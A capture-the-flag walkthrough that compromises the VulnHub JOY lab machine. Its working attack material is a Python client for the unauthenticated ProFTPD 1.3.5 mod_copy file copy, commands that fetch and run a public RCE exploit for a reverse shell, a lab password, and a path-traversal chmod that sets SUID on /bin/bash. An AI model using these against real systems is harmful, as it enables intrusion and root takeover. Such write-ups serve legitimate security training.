Digitalworld JOY ~ VulnHub

The Bitz are 2 Sticky~!


Prerequisite

Just to make life easier, I usually add an entry to my hosts file so the target can be referred to by name instead of by IP.

echo "192.168.72.130	joy.vhub" >> /etc/hosts

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# nmap -Pn -sV -sC -oN initial joy.vhub 
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-25 04:34 EST
Nmap scan report for joy.vhub (192.168.72.133)
Host is up (0.000046s latency).
Not shown: 988 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL AUTH-RESP-CODE PIPELINING RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more IDLE ENABLE LOGINDISABLEDA0001 STARTTLS capabilities listed LITERAL+ post-login SASL-IR have ID Pre-login OK LOGIN-REFERRALS IMAP4rev1
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:04:EF:C6 (VMware)
Service Info: Hosts: The,  JOY.localdomain, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2021-02-25T17:34:41+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-02-25T09:34:41
|_  start_date: N/A

Scanning & Enumeration

Based on the scan, I saw that port 21 was running an FTP server (ProFTPD) that allowed anonymous logins, with a world-writable upload directory alongside the download directory.

I then mirrored the whole anonymous FTP root to my local system:

wget -m ftp://anonymous:anonymous@joy.vhub

In the downloaded directory was a text file containing a directory listing of the user patrick's home directory. In there was an interesting file named version_control.

I then used the FTP server's SITE CPFR / SITE CPTO commands (ProFTPD's mod_copy module) to copy this file from patrick's home directory into the anonymous FTP tree. This way I could read it locally without having any access to the machine yet:

site cpfr <from>
site cpto <to>

version_control revealed that the machine was running ProFTPD 1.3.5. After digging around for a while, I found this RCE exploit on GitHub for the mod_copy bug in that particular version; it uses the same two SITE commands, but copies a payload into the web directory.
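The exchange above, as an added example that is not the walkthrough's own script or the linked exploit: ProFTPD 1.3.5's mod_copy accepts SITE CPFR and SITE CPTO on the control connection before any USER/PASS, so the client below never logs in. The source and destination paths, the host, and the server reply texts in the constructed transcript are assumptions; a patched server answers 530 to the first SITE command, which the client treats as failure.

```python
import io
import socket
from typing import List, Tuple

# RFC 959 reply classes mod_copy uses: 350 = intermediate (source noted),
# 250 = action completed (copy done)
EXPECTED = {"SITE CPFR": 350, "SITE CPTO": 250}


def read_reply(rfile) -> Tuple[int, str]:
    """Read one FTP reply, including the multi-line 'nnn-' form (RFC 959 4.2)."""
    first = rfile.readline()
    if not first:
        raise ConnectionError("server closed the control connection")
    first = first.decode("utf-8", "replace")
    code = int(first[:3])
    lines = [first.rstrip("\r\n")]
    if first[3:4] == "-":
        # continuation lines until one that starts with '<code> '
        while True:
            line = rfile.readline().decode("utf-8", "replace")
            if not line:
                raise ConnectionError("connection closed mid-reply")
            lines.append(line.rstrip("\r\n"))
            if line.startswith(f"{code} "):
                break
    return code, "\n".join(lines)


def send_cmd(rfile, wfile, cmd: str) -> Tuple[int, str]:
    wfile.write((cmd + "\r\n").encode())
    wfile.flush()
    return read_reply(rfile)


def mod_copy(rfile, wfile, src: str, dst: str) -> List[Tuple[str, int]]:
    """Copy src to dst server-side. No USER/PASS is sent: that is the 1.3.5 bug.
    Returns the (command, reply code) pairs; raises on any unexpected reply."""
    code, banner = read_reply(rfile)
    if code != 220:
        raise RuntimeError(f"unexpected banner: {banner}")
    done = []
    for verb, path in (("SITE CPFR", src), ("SITE CPTO", dst)):
        code, text = send_cmd(rfile, wfile, f"{verb} {path}")
        done.append((verb, code))
        if code != EXPECTED[verb]:
            raise RuntimeError(f"{verb} {path} rejected: {text}")
    return done


def mod_copy_tcp(host: str, src: str, dst: str, port: int = 21):
    """Run the exchange against a live target over TCP (unauthenticated)."""
    with socket.create_connection((host, port), timeout=10) as s:
        return mod_copy(s.makefile("rb"), s.makefile("wb"), src, dst)


def simulate(transcript: bytes, src: str, dst: str):
    """Offline run against a constructed server transcript.
    Returns (replies, bytes the client sent)."""
    rfile, wfile = io.BytesIO(transcript), io.BytesIO()
    replies = mod_copy(rfile, wfile, src, dst)
    return replies, wfile.getvalue()


# Constructed transcript modelled on ProFTPD 1.3.5 replies (not captured from the box)
OK_TRANSCRIPT = (
    b"220 ProFTPD 1.3.5 Server (Debian) [::ffff:192.168.72.133]\r\n"
    b"350 File or directory exists, ready for destination name\r\n"
    b"250 Copy successful\r\n"
)

if __name__ == "__main__":
    # hypothetical paths: patrick's file into the anonymous upload directory
    replies, sent = simulate(OK_TRANSCRIPT, "/home/patrick/version_control",
                             "/var/ftp/upload/version_control")
    print(replies)
    print(sent.decode())
```

Against a live box, `mod_copy_tcp("joy.vhub", src, dst)` does the same thing; the copy runs with the FTP daemon's privileges, so the destination only needs to be somewhere the daemon can write and you can read (the anonymous upload directory here, the web root in the exploit).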

Exploitation

┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# wget https://raw.githubusercontent.com/thegingerninja/ProFTPd_1_3_5_mod_copy_exploit/master/exploit_proftd_1_3_5.py

┌──(root💀nee)-[~/boxes/vulnhub/digitalworldJOY]
└─# ./exploit_proftd_1_3_5.py <target IP> <Target web dir> <Local IP> <Local Port>

I then caught the incoming shell with a netcat listener.

Lateral Movement

I then ran linpeas.sh, as always, which revealed an interesting file in the web directory.

Reading this file gave me the user patrick's credentials, but not root's.

patrick:apollo098765

Privilege Escalation

I first ran sudo -l to check for any binaries that the user patrick was allowed to run as root.

This revealed that patrick could run a single binary named test with sudo.

The binary seemed to be a small application for changing the permissions of files in "this directory". My plan was to set the SUID bit (not the sticky bit) on the bash binary and then use bash's -p option, which keeps the effective UID instead of dropping it back to the real UID.

I then ran the application and, when prompted for the file name in "this directory", I specified ../../../../../bin/bash. The helper only joins the name onto its directory, so the ../ segments climb out of "this directory" and the chmod lands on /bin/bash itself.

Lastly, I ran /bin/bash -p and gained root access to the machine~!
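The path traversal and the SUID check above, as an added example that is not the box's test binary: a helper that merely string-joins the user's file name onto its working directory lets ../ segments escape it, while a confined version resolves the path and refuses anything outside the directory. BASE_DIR and the function names are illustrative assumptions; the demo sets the bit on a throwaway file, never on the real /bin/bash.

```python
import os
import stat
import tempfile
import shutil

BASE_DIR = "/opt/test"  # hypothetical directory the sudo helper is meant to work in


def resolve_naive(base: str, name: str) -> str:
    """What the vulnerable helper effectively does: join the name onto base
    and let '..' be resolved. Nothing stops the result from leaving base."""
    return os.path.normpath(os.path.join(base, name))


def resolve_confined(base: str, name: str) -> str:
    """Hardened version: resolve symlinks and '..', then require that the
    result still lies under base before touching it."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, name))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError(f"{name!r} escapes {base_real}")
    return target


def is_suid(path: str) -> bool:
    """True if the set-user-ID bit is on (the 's' in -rwsr-xr-x from ls -l)."""
    return bool(os.stat(path).st_mode & stat.S_ISUID)


def demo_suid_on_copy() -> bool:
    """Apply the walkthrough's chmod to a scratch file instead of /bin/bash
    and confirm it with is_suid(). Returns whether the bit was set."""
    tmp = tempfile.mkdtemp()
    try:
        target = resolve_naive(os.path.join(tmp, "app"), "../fake_bash")  # escapes app/
        with open(target, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(target, 0o4755)   # rwsr-xr-x: what the helper ends up doing to /bin/bash
        return is_suid(target)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    print(resolve_naive(BASE_DIR, "../../../../../bin/bash"))   # /bin/bash
    try:
        resolve_confined(BASE_DIR, "../../../../../bin/bash")
    except ValueError as e:
        print("confined helper refuses:", e)
    print("SUID bit set on scratch copy:", demo_suid_on_copy())
```

After the real chmod, `ls -l /bin/bash` should show `-rwsr-xr-x`; bash then has to be started with `-p`, because without it bash notices that the effective UID differs from the real UID and drops the privilege before running anything.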

ROOTY!